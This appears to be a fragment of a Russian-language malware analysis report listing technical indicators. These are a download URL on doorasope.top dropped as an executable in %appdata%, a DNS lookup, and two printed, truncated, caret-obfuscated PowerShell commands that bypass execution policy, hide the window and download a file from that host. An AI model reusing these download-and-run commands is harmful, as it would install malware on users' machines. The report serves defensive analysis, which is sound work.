Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOW^ershEL^l.Exe -ExEcuTI^oNp^oL^I^CY B^YPA^ss -N^O^prOf^I^le -WINd^O^WStyL^e ^hIdde^N ^(ne^W-^O^bJEC^T ^S^Y^sT^em.nE^t^.W^Eb^C^l^IEn^T).dOWnl^o^ADf^iLe('http://www.doorasope.t...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "pOW^ershEL^l.Exe -ExEcuTI^oNp^oL^I^CY B^YPA^ss -N^O^prOf^I^le -WINd^O^WStyL^e ^hIdde^N ^(ne^W-^O^bJEC^T ^S^Y^sT^em.nE^t^.W^Eb^C^l^IEn^T).dOWnl^o^ADf^iLe('http://www.doorasope.t...' (со скрытым окном)